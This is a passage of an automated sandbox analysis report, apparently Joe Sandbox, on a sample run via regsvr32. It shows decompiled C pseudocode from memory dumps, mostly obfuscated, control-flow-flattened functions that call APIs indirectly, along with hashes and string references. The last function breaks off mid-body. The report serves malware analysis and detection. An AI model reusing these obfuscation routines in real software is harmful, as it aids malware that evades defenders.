0x040ee7e7
0x040ee801
0x040ee806
0x040ee816
0x00000000
0x040ee816
0x040ee808
0x00000000
0x040ee808
0x040ee7e9
0x040ee7ef
0x00000000
0x00000000
0x040ee7f7
0x00000000
0x040ee7f7

Strings

$P, xrefs: 040EE623
ma+, xrefs: 040EE57D
-, xrefs: 040EE5D4
ap@', xrefs: 040EE5A3

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$ap@'$-$ma+
API String ID: 0-1845766705
Opcode ID: d99141453e30432994ff44ca76447025f1ff5b22a9f9264b38871bdfd28efcd4
Instruction ID: 613e03344ffa4910a501eea8601601d16aea459a15e4353e8e2ae7730d078522
Opcode Fuzzy Hash: d99141453e30432994ff44ca76447025f1ff5b22a9f9264b38871bdfd28efcd4
Instruction Fuzzy Hash: 2B917B71208305CFC768CE26C59897EBBE1FBD4308F04492EE99666260D770AA59CB83

Uniqueness

Uniqueness Score: -1.00%

Function 040E3EAA, Relevance: 5.2, Strings: 4, Instructions: 152
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E040E3EAA() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _t134;
				void* _t136;
				signed int _t139;
				signed int _t140;
				void* _t141;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				void* _t162;
				signed int _t163;
				signed int* _t164;

				_t164 =  &_v572;
				_v540 = 0x8ebbe1;
				_v540 = _v540 ^ 0xad58d7a7;
				_t141 = 0x14ab4b7;
				_v540 = _v540 + 0xffffedc9;
				_v540 = _v540 ^ 0xadd357de;
				_v568 = 0x9c9bda;
				_v568 = _v568 | 0x36ff3ceb;
				_v568 = _v568 << 9;
				_v568 = _v568 << 0xc;
				_v568 = _v568 ^ 0xff6ebe8a;
				_v572 = 0xc63a18;
				_t158 = 0x35;
				_v572 = _v572 / _t158;
				_v572 = _v572 + 0x3c6e;
				_t162 = 0;
				_t159 = 9;
				_v572 = _v572 * 0x2b;
				_v572 = _v572 ^ 0x00acfd7d;
				_v564 = 0xeb3370;
				_v564 = _v564 + 0xdf6d;
				_v564 = _v564 + 0xffff5689;
				_v564 = _v564 + 0xffff8af1;
				_v564 = _v564 ^ 0x00e2fb3e;
				_v556 = 0xcf22db;
				_v556 = _v556 + 0xdc1c;
				_v556 = _v556 ^ 0xabcda180;
				_v556 = _v556 * 0x79;
				_v556 = _v556 ^ 0xd41378ff;
				_v536 = 0x8b65e6;
				_v536 = _v536 >> 4;
				_v536 = _v536 | 0x892333f7;
				_v536 = _v536 ^ 0x8920b82e;
				_v552 = 0x92756e;
				_v552 = _v552 >> 9;
				_v552 = _v552 ^ 0x00055fbe;
				_v548 = 0xae9165;
				_v548 = _v548 >> 8;
				_v548 = _v548 << 3;
				_v548 = _v548 ^ 0x000d4470;
				_v560 = 0x7e7234;
				_t163 = _v552;
				_t140 = _v552;
				_v560 = _v560 * 0x4b;
				_v560 = _v560 * 0x7e;
				_v560 = _v560 / _t159;
				_v560 = _v560 ^ 0x06ab9265;
				_v524 = 0x1cfeb9;
				_v524 = _v524 + 0xfb24;
				_v524 = _v524 ^ 0x001447a0;
				_v532 = 0x9f8444;
				_t160 = 0x41;
				_t161 = _v552;
				_v532 = _v532 / _t160;
				_v532 = _v532 ^ 0x00060648;
				_v528 = 0xb53968;
				_v528 = _v528 >> 6;
				_v528 = _v528 ^ 0x00025f1c;
				while(_t141 != 0x6ff509) {
					if(_t141 == 0x14ab4b7) {
						_t141 = 0x9db1fde;
						continue;
					} else {
						if(_t141 == 0x18d2c7e) {
							_t140 = E040E09DD(_v536,  &_v520, _v552, _v548);
							_t141 = 0x3c9aed4;
							continue;
						} else {
							if(_t141 == 0x3c9aed4) {
								_t134 = E040DEFE1(_v524, _v532, _v528, _t140);
								_t164 =  &(_t164[3]);
								_t163 = _t134;
								_t141 = 0x6ff509;
								continue;
							} else {
								if(_t141 == 0x65dbbcc) {
									_push(_t141);
									_t136 = E040E0ABA(_v568, _v572, __eflags, _v564,  &_v520, _t161, _v556);
									_t164 =  &(_t164[5]);
									__eflags = _t136;
									if(__eflags != 0) {
										_t141 = 0x18d2c7e;
										continue;
									}
								} else {
									if(_t141 != 0x9db1fde) {
										L15:
										__eflags = _t141 - 0xdb9fdb2;
										if(__eflags != 0) {
											continue;
										}
									} else {
										_t139 = E040DDD35();
										_t161 = _t139;
										if(_t139 != 0) {
											_t141 = 0x65dbbcc;
											continue;
										}
									}
								}
							}
						}
					}
					return _t162;
				}
				_v544 = 0xee725a;
				_v544 = _v544 ^ 0x4fb40d60;
				_v544 = _v544 | 0x3a9e06c5;
				_v544 = _v544 ^ 0x55f97f1d;
				__eflags = _t163 - _v544;
				_t162 =  ==  ? 1 : _t162;
				_t141 = 0xdb9fdb2;
				goto L15;
			}

0x040e3eaa
0x040e3eb0
0x040e3eba
0x040e3ec2
0x040e3ec7
0x040e3ecf
0x040e3ed7
0x040e3edf
0x040e3ee7
0x040e3eec
0x040e3ef1
0x040e3ef9
0x040e3f09
0x040e3f0e
0x040e3f14
0x040e3f1c
0x040e3f23
0x040e3f26
0x040e3f2a
0x040e3f32
0x040e3f3a
0x040e3f42
0x040e3f4a
0x040e3f52
0x040e3f5a
0x040e3f62
0x040e3f6a
0x040e3f77
0x040e3f7b
0x040e3f83
0x040e3f8b
0x040e3f90
0x040e3f98
0x040e3fa0
0x040e3fa8
0x040e3fad
0x040e3fb5
0x040e3fbd
0x040e3fc2
0x040e3fc7
0x040e3fcf
0x040e3fdc
0x040e3fe0
0x040e3fe4
0x040e3fed
0x040e3ff9
0x040e3ffd
0x040e4005
0x040e400d
0x040e4015
0x040e401d
0x040e4029
0x040e402c
0x040e4030
0x040e4034
0x040e403c
0x040e4044
0x040e4049
0x040e4051
0x040e4063
0x040e4124
0x00000000
0x040e4069
0x040e406f
0x040e4118
0x040e411a
0x00000000
0x040e4075
0x040e407b
0x040e40ed
0x040e40f2
0x040e40f5
0x040e40f7
0x00000000
0x040e407d
0x040e4083
0x040e40ab
0x040e40c2
0x040e40c7
0x040e40ca
0x040e40cc
0x040e40d2
0x00000000
0x040e40d2
0x040e4085
0x040e408b
0x040e415f
0x040e415f
0x040e4165
0x00000000
0x00000000
0x040e4091
0x040e4095
0x040e409a
0x040e409e
0x040e40a4
0x00000000
0x040e40a4
0x040e409e
0x040e408b
0x040e4083
0x040e407b
0x040e406f
0x040e4177
0x040e4177
0x040e412e
0x040e4138
0x040e4141
0x040e4149
0x040e4155
0x040e4157
0x040e415a
0x00000000

Strings

4r~, xrefs: 040E3FCF
Zr, xrefs: 040E412E
p3, xrefs: 040E3F32
n<, xrefs: 040E3F14

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4r~$Zr$n<$p3
API String ID: 0-1989199487
Opcode ID: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
Instruction ID: 4d425ecb2a19ba40e2e282ab95c5c794fa290a27cdf07eb00a03bb51659f6d76
Opcode Fuzzy Hash: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
Instruction Fuzzy Hash: 0B6158715083409FC768CE26C48942FBBE2FBD8758F104A2DF29AA6261D3B5DA45CF47

Uniqueness

Uniqueness Score: -1.00%

Function 040E9A01, Relevance: 5.1, Strings: 4, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E040E9A01(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t106;
				intOrPtr _t127;
				void* _t128;
				void* _t130;
				intOrPtr _t143;
				void* _t144;
				void* _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				void* _t150;
				void* _t151;

				_push(_a12);
				_t144 = __edx;
				_t128 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t106);
				_v4 = 0x81363a;
				_t151 = _t150 + 0x14;
				_v4 = _v4 | 0xe86970e7;
				_v4 = _v4 ^ 0xe8e8406c;
				_t145 = 0;
				_v8 = 0xe36f3c;
				_t130 = 0x9d12efa;
				_t10 =  &_v8; // 0xe36f3c
				_t146 = 0x18;
				_v8 =  *_t10 / _t146;
				_v8 = _v8 ^ 0x000ac4f9;
				_v28 = 0x86ae71;
				_v28 = _v28 + 0x307d;
				_v28 = _v28 ^ 0x3f5774ce;
				_v28 = _v28 ^ 0x3fdb82be;
				_v12 = 0xd5596e;
				_t147 = 0x24;
				_v12 = _v12 * 0x75;
				_v12 = _v12 ^ 0x618cdae6;
				_v16 = 0xa0cb2;
				_v16 = _v16 + 0x618a;
				_v16 = _v16 + 0xfb99;
				_v16 = _v16 ^ 0x0001ef53;
				_v20 = 0xb65aa2;
				_v20 = _v20 | 0x7ee7663c;
				_v20 = _v20 + 0xffff14a1;
				_v20 = _v20 ^ 0x7ef81620;
				_v24 = 0x69cefc;
				_v24 = _v24 * 5;
				_v24 = _v24 ^ 0x0216a415;
				_v44 = 0xc8ca94;
				_v44 = _v44 * 0x55;
				_v44 = _v44 << 0xc;
				_v44 = _v44 >> 2;
				_v44 = _v44 ^ 0x2d01fb93;
				_v32 = 0xaa7e08;
				_v32 = _v32 << 6;
				_v32 = _v32 / _t147;
				_v32 = _v32 | 0xdbfc63c4;
				_v32 = _v32 ^ 0xdbf76cca;
				_v36 = 0x12ed95;
				_v36 = _v36 + 0xd11f;
				_t148 = 0x64;
				_v36 = _v36 / _t148;
				_v36 = _v36 ^ 0x700cfa35;
				_v36 = _v36 ^ 0x700e1ad8;
				_v40 = 0xf66f66;
				_v40 = _v40 + 0xffff4d0b;
				_v40 = _v40 + 0xffffdddb;
				_v40 = _v40 + 0xffff052c;
				_v40 = _v40 ^ 0x00f507b6;
				do {
					while(_t130 != 0x348ce2d) {
						if(_t130 == 0x5264aba) {
							_t143 =  *0x40f6228; // 0x0
							E040F2B09(_v32, _t143, _v36, _v40);
						} else {
							if(_t130 == 0x5e19b60) {
								if(E040F3EE9() != 0) {
									_t130 = 0x348ce2d;
									continue;
								}
							} else {
								if(_t130 == 0x8610059) {
									E040DDCA0();
									_t130 = 0x5264aba;
									continue;
								} else {
									if(_t130 != 0x9d12efa) {
										goto L12;
									} else {
										_push(_t130);
										_push(_t130);
										_t127 = E040DC5D8(0x30);
										_t151 = _t151 + 0xc;
										 *0x40f6228 = _t127;
										_t130 = 0x5e19b60;
										continue;
									}
								}
							}
						}
						L15:
						return _t145;
					}
					_t145 = E040D3271(_v16, _t144, _v20, _t128, _v24, _v44);
					_t151 = _t151 + 0x10;
					if(_t145 == 0) {
						_t130 = 0x8610059;
						goto L12;
					}
					goto L15;
					L12:
				} while (_t130 != 0xbdf1695);
				goto L15;
			}

0x040e9a08
0x040e9a0c
0x040e9a0e
0x040e9a10
0x040e9a14
0x040e9a18
0x040e9a19
0x040e9a1a
0x040e9a1f
0x040e9a27
0x040e9a2a
0x040e9a34
0x040e9a3c
0x040e9a3e
0x040e9a46
0x040e9a4b
0x040e9a51
0x040e9a56
0x040e9a5c
0x040e9a64
0x040e9a6c
0x040e9a74
0x040e9a7c
0x040e9a84
0x040e9a91
0x040e9a94
0x040e9a98
0x040e9aa0
0x040e9aa8
0x040e9ab0
0x040e9ab8
0x040e9ac0
0x040e9ac8
0x040e9ad0
0x040e9ad8
0x040e9ae0
0x040e9af5
0x040e9af9
0x040e9b01
0x040e9b0e
0x040e9b12
0x040e9b17
0x040e9b1c
0x040e9b24
0x040e9b2c
0x040e9b39
0x040e9b3d
0x040e9b45
0x040e9b4d
0x040e9b55
0x040e9b61
0x040e9b69
0x040e9b6d
0x040e9b75
0x040e9b7d
0x040e9b85
0x040e9b8d
0x040e9b95
0x040e9b9d
0x040e9ba5
0x040e9ba5
0x040e9baf
0x040e9c4a
0x040e9c54
0x040e9bb5
0x040e9bbb
0x040e9c08
0x040e9c0a
0x00000000
0x040e9c0a
0x040e9bbd
0x040e9bc3
0x040e9bf5
0x040e9bfa
0x00000000
0x040e9bc5
0x040e9bcb
0x00000000
0x040e9bcd
0x040e9bdd
0x040e9bde
0x040e9be1
0x040e9be6
0x040e9be9
0x040e9bee
0x00000000
0x040e9bee
0x040e9bcb
0x040e9bc3
0x040e9bbb
0x040e9c5c
0x040e9c64
0x040e9c64
0x040e9c26
0x040e9c28
0x040e9c2d
0x040e9c2f
0x00000000
0x040e9c2f
0x00000000
0x040e9c34
0x040e9c34
0x00000000

Strings

}0, xrefs: 040E9A6C
l@, xrefs: 040E9A34
<f~, xrefs: 040E9AC8
<o, xrefs: 040E9A4B

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <f~$<o$l@$}0
API String ID: 0-758050912
Opcode ID: 0fdd79f8b2ca7d9240f6a09ef81069fb5b2bcdf1ca986d2e5092b005e38a2e87
Instruction ID: 7a2304b307fb917262dce4f00127322391aadf401e6dfdddb3a323d10a6069f3
Opcode Fuzzy Hash: 0fdd79f8b2ca7d9240f6a09ef81069fb5b2bcdf1ca986d2e5092b005e38a2e87
Instruction Fuzzy Hash: 9B5186B1108300AFD784CF22C88942FBBE1EFC8358F50591DF69666260E3B19A58CF87

Uniqueness

Uniqueness Score: -1.00%

Function 040D2194, Relevance: 5.1, Strings: 4, Instructions: 83
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E040D2194(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t67;
				intOrPtr* _t77;
				signed int _t80;
				signed int _t81;
				void* _t88;

				_t88 = __ecx;
				E040EFE29(_t67);
				_v28 = 0x23b662;
				_v24 = 0;
				_v12 = 0x5a4623;
				_v12 = _v12 + 0x2367;
				_v12 = _v12 ^ 0x11a2f25e;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x3f16c1ec;
				_v20 = 0x4a1b7a;
				_v20 = _v20 ^ 0x2a8c83f5;
				_v20 = _v20 ^ 0x0b06bd0c;
				_v20 = _v20 ^ 0x21c6558f;
				_v8 = 0x75635a;
				_v8 = _v8 >> 0xc;
				_t80 = 0x19;
				_v8 = _v8 / _t80;
				_v8 = _v8 ^ 0x5f69645e;
				_v8 = _v8 ^ 0x5f68d09e;
				_v16 = 0xc2b090;
				_v16 = _v16 + 0xffff85c8;
				_t81 = 0x7c;
				_v16 = _v16 / _t81;
				_v16 = _v16 ^ 0x000d5e79;
				_t77 = E040DEB52(_t81, _t81, 0x525cea78, 0xe3, 0x4be980c1);
				return  *_t77(_a56, _a36, _a48, 0, 0, _a16, _a60, _t88, _a44, _a52, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, 0, _a32, _a36, _a40, _a44, _a48, _a52, _a56, _a60);
			}

0x040d21a1
0x040d21cb
0x040d21d0
0x040d21da
0x040d21df
0x040d21e6
0x040d21ed
0x040d21f4
0x040d21f8
0x040d21ff
0x040d2206
0x040d220d
0x040d2214
0x040d221b
0x040d2222
0x040d222b
0x040d2230
0x040d2235
0x040d223c
0x040d2243
0x040d224a
0x040d2254
0x040d225c
0x040d225f
0x040d227e
0x040d22a5

Strings

y^, xrefs: 040D225F
g#, xrefs: 040D21E6
#FZ, xrefs: 040D21DF
^di_, xrefs: 040D2235

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #FZ$^di_$g#$y^
API String ID: 0-3614166594
Opcode ID: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
Instruction ID: 426c19fb89164c40732f314383ac4a0b21a9f29e98d25817add17cf6514bf862
Opcode Fuzzy Hash: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
Instruction Fuzzy Hash: 3C31F272800208FBDF05DFA5DC098DEBFB6FF89314F508159FA10A6120D3B69A60AF90

Uniqueness

Uniqueness Score: -1.00%

Function 10027704, Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10027704() {
				signed int _v8;
				char _v16;
				void* __esi;
				signed int _t8;
				intOrPtr* _t15;
				intOrPtr _t16;
				char _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;
				int _t25;
				signed int _t27;

				_t8 =  *0x10057a08; // 0x3643b451
				_v8 = _t8 ^ _t27;
				_t24 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
					L4:
					_t25 = GetACP();
				} else {
					_t20 = _v16;
					_t15 =  &_v16;
					if(_t20 == 0) {
						goto L4;
					} else {
						do {
							_t15 = _t15 + 1;
							_t24 = _t24 * 0xa + _t20 - 0x30;
							_t20 =  *_t15;
						} while (_t20 != 0);
						if(_t24 == 0) {
							goto L4;
						}
					}
				}
				return E100167D5(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
			}

0x1002770a
0x10027711
0x10027715
0x10027731
0x10027752
0x10027758
0x10027733
0x10027733
0x10027738
0x1002773b
0x00000000
0x1002773d
0x1002773d
0x10027743
0x10027744
0x10027748
0x1002774a
0x10027750
0x00000000
0x00000000
0x10027750
0x1002773b
0x10027768

APIs

GetThreadLocale.KERNEL32 ref: 10027717
GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10027729
GetACP.KERNEL32 ref: 10027752

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Locale$InfoThread
String ID:
API String ID: 4232894706-0
Opcode ID: 2cdb2551da010e6fdb5870f0ade684243d2ea15601f9ad5558c20012d78a2078
Instruction ID: 66289914fabe9bf2d1b1abcf1e27b8b8f35a8bed3fb6bd80cc0c1702fed1c004
Opcode Fuzzy Hash: 2cdb2551da010e6fdb5870f0ade684243d2ea15601f9ad5558c20012d78a2078
Instruction Fuzzy Hash: DCF0C231E042785BE701DB7598556EF77E4FF04B90B9101ADEC86E7280D720AE0987C4

Uniqueness

Uniqueness Score: -1.00%

Function 1000D804, Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000D804(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E1000D6C3() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E1000D7B8( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x1005a754(_a4, _a8);
			}

0x1000d811
0x1000d825
0x1000d839
0x1000d851
0x1000d83b
0x1000d842
0x1000d842
0x1000d859
0x00000000
0x1000d85b
0x00000000
0x1000d862
0x1000d859
0x00000000
0x1000d827
0x00000000

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e9ea1c9e954d40bf421bd01099b490e8a12a05a626fb39da3dad4e443b19b0f
Instruction ID: 387a2a710324106c5c2e9ba8f0dac284bfb83953cc403e56f04fca2c0ded1ab9
Opcode Fuzzy Hash: 0e9ea1c9e954d40bf421bd01099b490e8a12a05a626fb39da3dad4e443b19b0f
Instruction Fuzzy Hash: 71F0C935504209AAFF01EF61CC489AE7BA9EF043D4B10C026FC19D5068DB35DA559BA1

Uniqueness

Uniqueness Score: -1.00%

Function 040E8FAE, Relevance: 4.1, Strings: 3, Instructions: 312
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E040E8FAE(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* _t364;
				void* _t367;
				void* _t375;
				void* _t379;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				intOrPtr _t420;
				intOrPtr* _t425;
				void* _t429;
				signed int* _t430;

				_t430 =  &_v164;
				_v44 = 0xc56d85;
				_v44 = _v44 | 0x6747c0a0;
				_v44 = _v44 ^ 0x67c7eda5;
				_v148 = 0xd0221b;
				_v148 = _v148 + 0xb86b;
				_t425 = __ecx;
				_t429 = 0;
				_t382 = 0x2d;
				_v4 = __ecx;
				_t379 = 0x771143;
				_v148 = _v148 / _t382;
				_v148 = _v148 * 0x66;
				_v148 = _v148 ^ 0x01d966be;
				_v152 = 0x268288;
				_v152 = _v152 + 0xc42a;
				_v152 = _v152 * 0x1a;
				_v152 = _v152 | 0x9e13f09a;
				_v152 = _v152 ^ 0x9ffffe9e;
				_v84 = 0x856365;
				_v84 = _v84 + 0xffff26a7;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x0848a0c0;
				_v72 = 0xf332ed;
				_v72 = _v72 ^ 0xef6a6dd6;
				_v72 = _v72 >> 6;
				_v72 = _v72 ^ 0x03be657c;
				_v120 = 0xd51e66;
				_v120 = _v120 | 0x823b6191;
				_v120 = _v120 + 0xffffb8fb;
				_v120 = _v120 + 0xaa7;
				_v120 = _v120 ^ 0x82fd9684;
				_v108 = 0xd10da2;
				_v108 = _v108 + 0xffff1c26;
				_v108 = _v108 + 0xffff12ce;
				_v108 = _v108 ^ 0x00cc3eec;
				_v76 = 0x14aa13;
				_v76 = _v76 ^ 0xa7d92c4a;
				_v76 = _v76 >> 0xc;
				_v76 = _v76 ^ 0x000074b4;
				_v92 = 0x17a820;
				_v92 = _v92 ^ 0x3a93bf92;
				_v92 = _v92 | 0x1a458659;
				_v92 = _v92 ^ 0x3acb9ffe;
				_v144 = 0x9f1ca1;
				_v144 = _v144 << 3;
				_v144 = _v144 | 0x88246970;
				_v144 = _v144 + 0x8e62;
				_v144 = _v144 ^ 0x8cf667c6;
				_v52 = 0x8da33b;
				_v52 = _v52 >> 8;
				_v52 = _v52 ^ 0x00059428;
				_v96 = 0x1abb08;
				_v96 = _v96 ^ 0x6c742edf;
				_v96 = _v96 + 0xffff01f6;
				_v96 = _v96 ^ 0x6c6614ef;
				_v112 = 0x9f0f81;
				_v112 = _v112 * 0x6a;
				_v112 = _v112 >> 3;
				_v112 = _v112 ^ 0x083a0fed;
				_v156 = 0x609a24;
				_v156 = _v156 + 0xffff683f;
				_v156 = _v156 << 5;
				_v156 = _v156 + 0xcd31;
				_v156 = _v156 ^ 0x0c079756;
				_v164 = 0xe5cc1d;
				_v164 = _v164 << 7;
				_v164 = _v164 | 0x9a492847;
				_v164 = _v164 * 0x78;
				_v164 = _v164 ^ 0xa012b17f;
				_v128 = 0x53ee3c;
				_t120 =  &_v128; // 0x53ee3c
				_t383 = 0x29;
				_v128 =  *_t120 / _t383;
				_v128 = _v128 ^ 0x929088a5;
				_v128 = _v128 + 0xa7c3;
				_v128 = _v128 ^ 0x929242c1;
				_v140 = 0x5f30f1;
				_v140 = _v140 | 0xd1491927;
				_t384 = 0x7c;
				_v140 = _v140 / _t384;
				_t385 = 0x58;
				_v140 = _v140 / _t385;
				_v140 = _v140 ^ 0x000295f0;
				_v88 = 0x55e174;
				_v88 = _v88 ^ 0x7dd6f036;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x000a8d63;
				_v28 = 0xb452eb;
				_v28 = _v28 + 0xffff5322;
				_v28 = _v28 ^ 0x00ba2bf5;
				_v36 = 0x42507a;
				_v36 = _v36 | 0xf1dc1e20;
				_v36 = _v36 ^ 0xf1d9c77b;
				_v80 = 0xc31b4e;
				_v80 = _v80 ^ 0xd2ac5232;
				_t386 = 0x43;
				_v80 = _v80 / _t386;
				_v80 = _v80 ^ 0x03298e6e;
				_v124 = 0x46c8cc;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 5;
				_v124 = _v124 << 7;
				_v124 = _v124 ^ 0x1b2fd4b6;
				_v132 = 0x745205;
				_v132 = _v132 ^ 0x1862e0ae;
				_v132 = _v132 << 5;
				_v132 = _v132 >> 6;
				_v132 = _v132 ^ 0x0007d289;
				_v20 = 0x713f0f;
				_v20 = _v20 ^ 0x61c76558;
				_v20 = _v20 ^ 0x61bb476a;
				_v48 = 0x3998c0;
				_v48 = _v48 | 0xd3555304;
				_v48 = _v48 ^ 0xd37b9815;
				_v160 = 0xe5ad6c;
				_v160 = _v160 * 0x3a;
				_v160 = _v160 | 0x660736ab;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0xefd0e6e0;
				_v60 = 0x9fc9f5;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x000a96ad;
				_v16 = 0xa888b5;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x4445c6cc;
				_v104 = 0xee35af;
				_v104 = _v104 ^ 0xea83652e;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x536d6a1f;
				_v12 = 0x6066b2;
				_v12 = _v12 + 0xb1d6;
				_v12 = _v12 ^ 0x00605003;
				_v40 = 0x2dba20;
				_v40 = _v40 * 0x73;
				_v40 = _v40 ^ 0x1485b41c;
				_v136 = 0xfcb12d;
				_v136 = _v136 << 1;
				_v136 = _v136 + 0xaead;
				_v136 = _v136 + 0xffffaecb;
				_v136 = _v136 ^ 0x01ffed69;
				_v24 = 0x751c6a;
				_t387 = 0x7d;
				_v24 = _v24 / _t387;
				_v24 = _v24 ^ 0x0002b143;
				_v68 = 0x69a6e2;
				_v68 = _v68 + 0xaa03;
				_v68 = _v68 ^ 0x73662bb1;
				_v68 = _v68 ^ 0x730f0150;
				_v100 = 0xcb496d;
				_v100 = _v100 >> 1;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x0008f604;
				_v56 = 0x2cd04e;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0x0162f7e8;
				_v32 = 0xb2ca4d;
				_v32 = _v32 + 0x32b9;
